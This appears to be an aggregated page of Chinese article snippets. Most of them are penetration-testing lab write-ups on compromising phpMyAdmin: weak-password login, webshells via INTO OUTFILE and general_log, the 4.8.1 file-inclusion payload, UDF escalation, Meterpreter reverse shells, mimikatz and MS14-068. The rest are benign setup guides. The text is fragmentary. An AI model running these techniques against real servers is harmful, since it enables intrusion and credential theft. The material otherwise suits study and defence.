写在之前: 之前腾讯云线下推广的时候给同学们讲过一趟基于ubuntu系统安装WordPress搭建自己的个人博客的课程。...---- Step1:提权 首先,当然是 所有的操作当然要在root权限下进行喽 #sudo su ?...根据自己的情况进行选择,最后出现all done!就OK了!.../nginx.conf 1 keepalive_timeout 2; 噢噢,对了,顺带一提,vim的退出是 :wq 哦....#vim /etc/php/7.0/fpm/php.ini 设置 cgi.fix_pathinfo=0: 输入 /cgi.fix_pathinfo查询,找到后将值1改为0 ?
phpmyadmin是很多网站用来管理数据库的一个系统,尤其是mysql数据库管理的较多一些,最近phpmysql爆出漏洞,尤其是弱口令,sql注入漏洞,都会导致mysql的数据账号密码被泄露,那么如何通过...phpmyadmin来上传提权webshell呢 首先我们来搭建一下PHP+mysql环境,linux centos系统,PHP的版本是5.3,mysql版本是5.6,linux系统64位,apache...phpmyadmin漏洞利用 利用mysql数据库select into outfile方式来写入webshell到网站的根目录下,该漏洞的利用前提是必须知道网站的当前路径是多少,如何知道网站的当前路径...关于phpmyadmin网站的绝对路径获取,可以使用单引号来进行错误测试,在ID值后门加上单引号,有些网站就会爆出绝对的网站路径,再一个使用错误的赋值比如ID=1是正常,那么我们可以使用ID=-1,来进行报错...以上就是phpmyadmin漏洞利用,以及如何提权拿webshell的一些利用技巧,关于phpmyadmin漏洞的修复,SINE安全建议管理员关闭掉phpmyadmin的对外访问,只允许在服务器里打开phpmyadmin
>' into outfile '/var/www/xx/shell.php'; 会 报 错 提 示 Can't create/write to file '/var/www/html/666.txt'...name = 'sys_eval'; #查看创建的sys_eval函数 select sys_eval('whoami'); #使用系统命令 4.MOF提权.../phpinfo.txt%00 # 注意改下token值 在实际利用中可以利用写入文件到/tmp目录下结合此漏洞完成RCE,php版本可以通过http header、导出表内容到文件的附加内容看到.../var/l ib/php/sessions/sess_*** # *** 为phpMyAdmin的COOKIE值 5..../tmp/sess_***','plop'; # *** 为phpMyAdmin 的COOKIE值 这里要注意不用系统的session保存位置不同,具体系统可以在phpMyAdmin登录后首页看到 MacOS
0x00 介绍 phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL(3306)的数据库管理工具 这次教程我将在本地环境为大家演示如何在phpmyadmin提权。...1 xise菜刀*1 本地环境:这里我采用phpstudy2016下载地址https://www.xp.cn/download.html 0x02 正文 首先打开地址http://localhost/phpMyAdmin...接下来我们利用日志功能写入一句话 首先我们先在sql选项卡里执行以下语句 SHOW VARIABLES LIKE 'general%' 这是用来查看general_log功能是否开启,接着我们手动吧Value值手动改为...>'; 看文件成功写入啦 写下来我们打开菜刀进行连接 最后我们打开菜刀右下角cmd框进行之后的提权操作(之后的操作不在今天的课程范围,所以不做演示) 0x03 结尾 感谢大家的观看,谢谢!!
由于树莓派在软件和硬件上的更新,互联网中大多数有关在树莓派上部署LNMP环境的教程大多基于"树莓派2代",经过小苏的测试,这些教程已经不再适用于小苏手中的"树莓派3代"了,经过一番搜索和折腾,小苏最终找到了使用于...mcrypt php5-mysql php5-memcache php5-gd php5-sqlite php5-cgi php5-xmlrpc mysql-server mysql-client 值得一提的是...安装phpmyadmin: sudo apt-get install phpmyadmin 在安装过程中需要用户选择已安装的服务器类型,有apache和lighthttpd两个选择,但我们刚刚安装的...nginx却不在选择列表内,选择apache即可,没有影响。 ...如果你在安装phpmyadmin的过程中遇到了类似以下内容的提示,可以按Tab键切换光标,选择"Yes"后按Enter键确认以进行接下来的操作(若未遇到此提示请忽略): The phpmyadmin package
@@datadir参数看mysql路径 反猜绝对路径 可以通过写shell进行提权,而我们需要满足以下条件: 1.数据库root权限 2.知道网站的物理路径 3.数据库有写权限 MySQL 5.0+...当secure_file_priv的值为null ,表示限制mysql 不允许导入|导出 当secure_file_priv的值为/tmp/ ,表示限制mysql 的导入|导出只能发生在/tmp/目录下...当secure_file_priv的值没有具体值时,表示不对mysql 的导入|导出做限制 可以在mysql-ini文件中设置其属性 写入 一句phpinfo文件, select "'; 查询phpmyadmin cookie值(开发者工具查看) http://192.168.75.130:8080/index.php?...token=你的token值&gis_data[gis_type]= /../../../..
phpmyadmin后台getshell 对phpmyadmin后台进行爆破,得到账号密码:root/root ? 进入phpmyadmin后台后,获取shell。...传送门:phpmyadmin爆破和后台getshell 这里由于 secure_file_priv的值为NULL,所以我们不能利用写into outfile写木马getshell。 ?...在真实环境中,这里很多时候都是一个普通用户权限,需要我们去提权。 ? ? 获取账号密码 1:导出hash run hashdump ?...在这里顺带提一下这个用法。...但是这里我们是直接获得了域管理员的哈希,这里只是演示下MS14-068漏洞的攻击手法 先获取需要利用的域用户的SID值 ?
> 根据之前目录遍历漏洞找到flag.php 命令执行是一个管理员权限,到这里可以直接用shell连接工具就行,然后还有一个方法是通过phpMyAdmin,默认的用户名,密码:root phpmyadmin...那么,如果修改generallogfile的值,那么所执行的sql语句就会对应生成对应的文件中,进而getshell。...>' 然后使用蚁剑连接 杀入内网 发现我们刚刚拿到的shell是一个administrator权限的shell,这样我们就不用提权什么的了 查看3389是否开启(远程桌面的服务端口) 发现3389.../add #添加一个用户 net localgroup administrators test /add #将用户添加到管理员组 #登陆只能选择STU1域 #STU1...借助此类攻击,攻击者最终可能获取域控的访问权限,完全控制基于Windows系统的基础设施或与业务相关的关键账户。
方法一:弱口令登录phpmyadmin拿权限 进入phpmyadmin 对目标站点IP进行端口扫描,发现80和3306端口开放 ? 使用dirsearch进行目录扫描 ? ?...尝试对phpmyadmin进行爆破 ? phpmyadmin存在弱口令,用户名:root,密码:root ?...那么,如果修改generallogfile的值,那么所执行的sql语句就会对应生成对应的文件中,进而getshell。...成功抓取本机Administrator用户开机密码 利用cobalt strike提权 ? ?...在已有的 Beacon上右键 Spawn(生成会话 / 派生),选择创建的 smb beacon 的 listerner: ? ?
访问目标站点,发现开启3306 端口, 经过弱口令,爆破,目录泄露等途径已经获知PhpMyadmin的账号密码是root root 1.开始登陆到目标服务器的PhpMyadmin ?...2.检测MySQL全局变量(generallog、generallog file)的值。 general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。...利用的思路是开启generallog之后把generallogfile的值修改为我们网站默认路径下一个自定义的php文件中,然后我们通过log日志进行写入一句话后门到上面去,然后再进一步利用。...发现现在获取的权限为administrator权限,通过msf下getsystem来进行提权。...使用getsystem来进行提权。 ### 建立后门。 生成的后门文件路径: ? 后门加载成功 利用方式: 当用户登录到远程系统时,为我们打开一个Meterpreter会话 ? ### 连接后门 ?
0x02. web渗透 首先打开我们获取的web站点地址http://192.168.1.106 可以看到这是一个纯静态界面,一般遇到这种静态页面的环境我们可以选择先用御剑扫一扫目录或者用fierce爆破子域名...通过逐一访问对我们较有用的地址有test.php、phpmyadmin/ 其他地址基本都是静态或者用不了。 ...进入phpMyAdmin之后利用默认密码登陆不上去,尝试使用phpMyAdmin爆破工具进行弱口令爆破,因为这个web站点唯一可以供我们控制的就只有phpMyAdmin/这一个页面了,所以必须拿下,不然就无法进行后续操作...数据库提权 既然如此我选择使用数据库udf提权,当然也可以利用其他方法提权,这里随意发挥就好。...现在可以打开我的mysql提权工具进行提权啦,心情是不是莫名的好!
众所周知,WordPress 在安装时候可以选择表名前缀以在同一数据库安装多个WordPress 程序。...但是很多空间商,尤其是老外的虚拟主机商 允许建立多个数据库,这样为了便于管理,很多人在安装多个WordPress 程序的时候选择多个数据库而不是修改表名前缀,当然这样的方式也是被提倡的。...WordPress 用WordPress eXtended RSS导入(manage - export),不过这不是这里要讨论的了 更改 WordPress 数据库表名前缀步骤: 禁用所有插件,然后通过 phpmyadmin...使用 phpmyadmin 将你当前数据库 WordPress 表删除。 导入你刚才修改了的备份文件。...顺便提一下修改表名前缀的sql语句为: ALTER TABLE wp_bssn RENAME TO bssn_bssn 此句将把 wp_bssn 表更名为 bssn_bssn。 ----
(2)root数据库账号密码及另一个数据库账号密码 三、尝试PHPMyAdmin写Shell 很奇怪,sqlmap得到root得到的密码上不去,只好使用另一个账号登陆。 ?...五、UDF提权 在conn.php文件中找到root的账号密码,这个密码是root的base64编码,之前注入点跑出来的是明文,现在得以解释为什么登陆不上root了。 ?...使用已经得到的root账号登陆phpmyadmin,执行sql语句创建一个可以执行命令的函数: create function sys_eval returns string soname "lib_mysqludf_sys.dll...不知道为什么,除了执行whoami,执行其他命令就会返回16进制的值,很不方便。 ?...六、Cs上线 使用cobalt strick生成powershell payload并在phpmyadmin执行 ? 选择生成powershell command ? 选择好监听器 ?
扫到了phpmyadmin。 phpmyadmin是可以getshell的 phpmyadmin写shell 访问phpmyadmin 弱口令 root root登录之。...windows/meterpreter/reverse_tcp set lhost 192.168.31.222 set lport 4444 run getuid查看当前会话权限 getsystem自动尝试提权...密码抓取 首先msf加载mimikatz load mimikatz creds_msv 获取密码hash值 creds_kerberos 获取密码明文 成功抓取到了登陆密码。...总结 nmap探测端口,获取80端口,dirsearch扫目录发现phpstudy探测界面和phpmyadmin。 弱口令进入phpmyadmin 经典的phpmyadmin日志写webshell。...最后上线到msf提权。
Tomcat 再来看看Tomcat 经测试发现存在 CVE-2017-12615 任意文件写入漏洞 phpmyadmin 空密码的phpmyadmin 用户为test,权限不大,日志写shell不太可能.../etc/passwd Set-Cookie: phpMyAdmin=077b0523106423df70f4e354379eb8a7; path=/; HttpOnly cookie中的phpmyadmin...值就是session id 我们有了 sessionid 然后我们包含这个session文件 http://192.168.31.199:2003/index.php?...利用Kerberos 域用户提权漏洞(MS14-068;CVE-2014-6324)来获得域控。...利用MS14-068生成票据 又恰好靶场创建者把 MS14-068提权工具也被放到了桌面上。
3.使用MyISAM索引压缩非常快的B树磁盘表(),使用非常快速的基于线程的内存分配系统。 4.使用优化的嵌套循环联接执行非常快速的联接,实现内存中的哈希表,用作临时表。...连接验证非常灵活和安全,并且可以进行基于主机的验证。...,其取值范围越大需要的空间也就越多(注意有无符号数据取值范围); 类型如下: #查看帮助 help decimal TINYINT 微小 1B 0-255 -128~127...类型; 枚举类型 描述:其本质是文本字符串类型的一种延伸类型; 1.ENUM类型:存储的数据好比是单项选择题,其存储的值为表创建定义的枚举中的值选取一个,输入其他值则会报错; 2.SET类型:存储的数据好比是多项选择题...('a'); INSERT INTO setDemo VALUES ('a,b'); -- 关键点不是需要包含在一起 0x05 类型选择 (1) 字符串类型的选择 1.不同的数据引擎选择倾向不同; MYISAM
文章及建议 前段时间看到了个phpmyadmin提权的教程,很多人都说现在那里还有root帐号root密码这种弱口令,今天给大家来一套完整的教学。...然后选择自动后缀 ? 线程根据自己配置来配置,我直接选择最高500,然后开始爆破 ? 爆破结果 ? 防范建议 这里的话,想要防范这一步,可以采取的方法有关闭phpMyAdmin,这个最直接了....随便选择一个开搞 先看一下服务器信息xx.xx.xx.xx/l.php ? 网站路径什么的都爆出来了,登录后台 ? 老规矩,查下mysql日志文件路径 ?...参考文章 phpmyadmin从找目标到拿下服务器 版本说明 20180806 开始着手文章 20180807 文章完成时间
的分割,取值进行判断,只要解码后分割出来的值在whitelist中即可满足条件。而在 这样我们可以将?进行二次编码。如果传入target=db_sql.php%253f。.../etc/passwd 这里首先写入一个phpinfo,然后查看phpMyAdmin的value 得到phpMyAdmin:"990aadb371d8e582cb000c716aed9720",然后构造.../tmp/sess_990aadb371d8e582cb000c716aed9720 写入一句话木马查看phpMyAdmin的值然后构造payload进行文件包含用蚁剑连接即可 phpMyAdmin:...那么这里就可以尝试使用特权模式写入ssh私钥,使用ssh免密登录 这里首先新建一个tmptest文件夹,用来存放挂载后的docker 查看一下dev文件夹里面的设备文件 可以看到有四个sda设备文件,我这里选择...handler set payload/meterpreter/bind_tcp set lhost 192.168.1.10 set lport 4444 run 成功接收到DC会话使用getsystem提权到
phpmyadmin4.8.1 访问2003端口是一个直接暴露的phpmyadmin ?...的分割,取值进行判断,只要解码后分割出来的值在whitelist中即可满足条件。而在 ? 这样我们可以将?进行二次编码。如果传入target=db_sql.php%253f。...写入一句话木马查看phpMyAdmin的值然后构造payload进行文件包含用蚁剑连接即可 phpMyAdmin:"990aadb371d8e582cb000c716aed9720" ?...可以看到有四个sda设备文件,我这里选择sda1进行挂载 ?...成功接收到DC会话使用getsystem提权到system ? 上传mimikatz抓取DC密码,得到DEMO qwe123!@# ?
另外提一句有一个 manual 是帮助文件,在使用中遇到常见问题可以先翻一翻。 安装过程一般都按照软件默认的设置点击 OK,下一步就可以。为了防止重复初始化,请点击是确认。...2、phpmyadmin 新增用户、数据库。 点击 phpstudy 操作界面的 MySQL 管理,点击 PhpMyAdmin 进入网页版的管理界面。...输入用户名,密码,主机选择本地,后面的 localhost 是程序自动填写的。下面勾选“创建与用户同名的数据库并赋予权限”,下面点击“添加用户” ? 三、本地安装 wordpress 程序。...wordpress 程序安装过很多次了,这里简单提一下步骤。...1、在浏览器中输入 https://127.0.0.1 会打开 wordpress 安装页面,选择语言 2、第二个页面点击“现在就开始” 3、第三个页面中把刚才添加数据库用户时的账号(数据库名字和用户名字是相同的
领取专属 10元无门槛券
手把手带您无忧上云